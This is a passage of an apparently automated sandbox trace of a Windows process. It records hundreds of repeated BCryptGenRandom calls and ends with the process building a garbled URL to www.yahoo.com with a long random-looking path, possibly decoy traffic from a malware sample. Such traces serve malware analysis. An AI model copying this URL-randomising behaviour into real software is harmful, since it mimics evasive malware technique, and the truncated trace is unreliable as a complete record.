lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.922] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.922] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.922] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.922] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.923] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.923] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.923] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.924] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.924] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.924] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0192.925] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.925] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.926] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.926] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.926] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0192.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0192.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0192.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0192.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0193.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a032d7, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x3a032d7) returned 0x0 [0193.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0193.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0193.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0193.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0193.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a032e8, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x3a032e8) returned 0x0 [0193.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0193.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0193.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.152] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.153] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0193.153] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0193.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0193.153] GetProcessHeap () returned 0x440000 [0193.153] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0193.153] lstrcpyA (in: lpString1=0x473770, lpString2="vá,\x0bs://www.yahoo.com" | out: lpString1="vá,\x0bs://www.yahoo.com") returned="vá,\x0bs://www.yahoo.com" [0193.153] lstrcatA (in: lpString1="vá,\x0bs://www.yahoo.com", lpString2="/ZxoaPpnlhckt79oyakcdhz35Zrn3arik7Uvp5/fzgijkk2rmbRfsv4rmoyktbVrxigcktBhdyweydN5ep1Wbr/9geobkci6729cX7o9ccfwsSsyDdyGYn9Alk54Kohkj0Go3s/y29dJQqcb504XgdH/xcdoP3vt8hsS75byiviLAl9Rhxhwyiirb17ujJoMUxxkwxN/" | out: lpString1="vá,\x0bs://www.yahoo.com/ZxoaPpnlhckt79oyakcdhz35Zrn3arik7Uvp5/fzgijkk2rmbRfsv4rmoyktbVrxigcktBhdyweydN5ep1Wbr/9geobkci6729cX7o9ccfwsSsyDdyGYn9Alk54Kohkj0Go3s/y29dJQqcb504XgdH/xcdoP3vt8hsS75byiviLAl9Rhxhwyiirb17ujJoMUxxkwxN/") 